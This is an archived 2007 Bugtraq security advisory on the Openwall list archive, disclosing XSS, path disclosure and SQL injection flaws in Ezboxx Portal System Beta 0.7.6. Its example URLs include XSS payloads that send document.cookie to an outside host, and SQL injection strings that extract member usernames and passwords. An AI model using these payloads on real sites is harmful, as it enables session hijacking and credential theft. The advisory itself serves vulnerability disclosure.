lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070111215955.26433.qmail@securityfocus.com>
Date: 11 Jan 2007 21:59:55 -0000
From: Info@...Sec.com
To: bugtraq@...urityfocus.com
Subject: Ezboxx multiple vulnerabilities.

Ezboxx multiple vulnerabilities.

Vulnerable version:
Ezboxx Portal System Beta v 0.7.6 and below.
The Ezboxx Portal System Beta v 0.7.6 and below versions are vulnerable to Cross-site scripting, Path disclosure and SQL Injection attacks.

Cross-site scripting:
----------------------
Description:
Input passed to the parameters "pic" (in "piczoom.asp"), "nocatname" (in "user-upload.asp") and "iid" (in "newscomments.asp")
are not properly verified before being returned to the user as HTML code. 
Therefore an attacker may use one of the Cross-site scripting to execute arbitrary script code in the browser of the site's users.

Proof-of-concept:
http://[Host]/ezboxx/custom/piczoom.asp?pic=[XSS]
http://[Host]/ezboxx/boxx/user-upload.asp?nocatname=[XSS] - Login required
http://[Host]//ezboxx/indexes/newscomments.asp?iid=[XSS]

Examples:
http://[Host]/ezboxx/custom/piczoom.asp?pic=BugSec'+onerror='window.open("http://www.BugSec.com/Index.php?Security_Consulting_Company=Penetration-Testing&Cookie="+document.cookie)
http://[Host]/ezboxx/boxx/user-upload.asp?nocatname='><script>location.href='http://www.BugSec.com/Index.php?Info-Sec=Pen_Test&Cookie='+document.cookie</script>
http://[Host]/ezboxx/indexes/newscomments.asp?iid=200/*<script>location.href='http://www.BugSec.com/Index.php?Information-Security=Application_Security&Cookie='+document.cookie</script>*/


Path disclosure:
------------------
Description:
Path information can be disclosed in error pages by passing invalid input to the parameter "cat" in "knowledgebase.asp".

Proof-of-concept:
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=notnumber
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=1&Cat=notnumber

Examples:
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=exam
http://[Host]/ezboxx/boxx/knowledgebase.asp?Type=1&Cat=exam


SQL Injection:
-------------------
Description:
Input passed to the "iid" parameter in "ShowAppendix.asp" isn't properly verified before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
An attacker may use this vulnerability to extract any info (like account's passwords) from the database.

Proof-of-concept:
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=[SQL]

Example:
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+username+from+members))
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+password+from+members))


Credit:
Doron P and Eyal G from BugSec
Tel:+97239622655
Fax:+97239619351
Email:Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
Security Consulting Company

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ